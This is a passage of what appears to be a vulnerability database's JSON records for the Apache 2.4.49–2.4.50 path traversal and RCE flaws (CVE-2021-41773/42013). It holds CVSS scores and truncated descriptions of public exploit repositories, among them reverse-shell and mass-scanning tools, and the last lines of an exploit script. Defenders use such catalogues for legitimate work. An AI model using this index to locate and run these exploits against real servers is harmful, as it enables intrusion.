\nprint(\"\\n\\033[1;91m[!] Bye bye !\") \ntime.sleep(0.5) \nsys.exit(1) \n \nif __name__ == '__main__': \nmain() \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164941/apachehttp2450-exec.txt"}], "dsquare": [{"lastseen": "2021-11-26T18:37:32", "description": "Remote Code Execution in Apache\n\nVulnerability Type: Remote Command Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "dsquare", "title": "Apache 2.4.50 RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-07-16T00:00:00", "id": "E-738", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:37:32", "description": "Path traversal vulnerability in Apache\n\nVulnerability Type: File Disclosure", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "dsquare", "title": "Apache 2.4.50 Path Traversal", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-08T00:00:00", "id": "E-739", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-10-01T23:13:35", "description": "# CVE-2021-42013\nApache 2.4.49-50 Remote Code Ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-28T09:21:50", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-07-28T09:24:11", "id": "4051D2EF-1C43-576D-ADB2-B519B31F93A0", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-21T12:49:33", "description": "# cve-2021-42013\nApache 2.4.50 Path traversal vulnerab...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T05:44:54", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-07-04T15:27:56", "id": "6BCBA83C-4A4C-58D7-92E4-DF092DFEF267", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-42013 - Apache HTTP Server 2.4.50\n\n# Cara Menjalankan...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-20T15:32:39", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-23T13:16:56", "id": "5312D04F-9490-5472-84FA-86B3BBDC8928", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-02-08T18:31:10", "description": "# CVE-2021-42013\n## Poc CVE-2021-42013 - Apache 2.4.50 w...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-23T21:58:44", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-08-29T22:56:33", "id": "22DCCD26-B68C-5905-BAC2-71D10DE3F123", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-02-08T17:20:13", "description": "# Apache 2.4.50 - Path Traversal or Remote Code Execution\ncve-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-15T12:15:00", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-09-15T12:15:18", "id": "9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-09-15T15:23:57", "description": "# cve-2021-42013\nApache 2.4.50 Path traversal vulnerabi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-15T11:35:00", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-09-15T11:35:00", "id": "E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-02-08T17:20:24", "description": "# Apache 2.4.50 - Path Traversal or Remote Code Execution\ncve-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-15T11:28:39", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-09-15T11:28:51", "id": "CC15AE65-B697-525A-AF4B-38B1501CAB49", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T12:39:42", "description": "# CVE-2021-42013-LAB\nApache HTTP Server 2.4.50 - RCE Lab\n\n\n**exp...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-03T13:26:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-02-20T23:15:08", "id": "6A0A657E-8300-5312-99CE-E11F460B1DBF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-31T04:56:17", "description": "# CVE-2021-42013\nC implementation of the infamous [Apache 2.4.50...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-31T03:28:20", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-05-31T03:29:22", "id": "61075B23-F713-537A-9B84-7EB9B96CF228", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T22:19:41", "description": "# apache-exploit-CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T18:31:29", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-04-09T05:38:40", "id": "2A177215-CE4A-5FA7-B016-EEAF332D165C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-02-08T18:31:09", "description": "# CVE-2021-42013_Reverse-Shell\nPoC CVE-2021-42013 reverse shell ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-24T12:57:55", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-03-27T07:43:58", "id": "8713FD59-264B-5FD7-8429-3251AB5AB3B8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-28T15:50:38", "description": "# CVE-2021-42013\nApache 2.4.49-50 Remote Code Ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-28T09:21:50", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-07-28T09:24:11", "id": "E81474F6-6DDC-5FC2-828A-812A8815E3B4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-03-22T21:18:00", "description": "# Apache 2.4.50 - Path Traversal or Remote Code Execution\nCVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-27T14:29:10", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2023-02-10T09:20:38", "id": "52E13088-9643-5E81-B0A0-B7478BCF1F2C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-30T20:16:36", "description": "# CVE-2021-41773_CVE-2021-42013\nCVE-2021-41773 CVE-2021-42013\u591a\u7ebf\u7a0b...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-09T03:32:18", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-30T12:49:14", "id": "B81BC21D-818E-5B33-96D7-062C14102874", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# cve-2021-41773 and cve-2021-42013\n\ncve-2021-41773 \u548c cve-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-09T11:33:56", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-12T06:48:47", "id": "D0368327-F989-5557-A5C6-0D9ACDB4E72F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-14T20:00:41", "description": "![alt text](https://raw.githubusercontent.com/lsass-exe/CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-06T02:28:41", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-14T15:59:57", "id": "44E43BB7-6255-58E7-99C7-C3B84645D497", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-14T03:15:08", "description": "# CVE-2021-41773\n- [CVE-2021-41773: Path Traversal Zero-Day in A...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T11:55:10", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-14T01:27:30", "id": "A3F15BCE-08AD-509D-AE63-9D3D8E402E0B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-20T13:22:33", "description": "# Apache (Linux) CVE-2021-41773/2021-42013 Mass Vulnerability Ch...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-09T02:12:39", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", 